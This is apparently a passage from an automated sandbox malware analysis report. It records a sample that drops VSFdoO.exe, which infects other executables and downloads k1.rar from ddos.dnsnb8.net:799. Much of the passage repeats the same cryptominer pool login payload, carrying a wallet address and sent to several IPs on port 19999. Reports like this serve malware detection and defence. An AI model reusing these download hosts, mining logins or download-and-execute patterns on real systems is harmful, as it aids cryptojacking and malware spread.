.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:65160 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:65161 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:65162 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:58665 -> 5.161.70.189:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:58667 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:58668 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:58669 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:58670 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:58671 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:58672 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:58673 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:58674 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: LisectAVT_2403002B_48.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                  Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

                  Spreading

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_10004333 FindFirstFileW,FindClose,0_2_10004333
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_000B29E2
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_000B2B8C
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

                  Networking

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
                  Source: global trafficTCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
                  Source: global trafficTCP traffic: 192.168.2.4:49744 -> 88.198.117.174:19999
                  Source: global trafficTCP traffic: 192.168.2.4:49745 -> 5.75.158.61:19999
                  Source: global trafficTCP traffic: 192.168.2.4:65157 -> 5.161.70.189:19999
                  Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
                  Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.161.70.189
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.161.70.189
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.161.70.189
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.161.70.189
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.161.70.189
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.161.70.189
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.161.70.189
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.161.70.189
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.161.70.189
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.161.70.189
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_000B1099
                  Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
                  Source: global trafficDNS traffic detected: DNS query: auto.c3pool.org
                  Source: VSFdoO.exe, 00000001.00000003.1688795553.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
                  Source: VSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
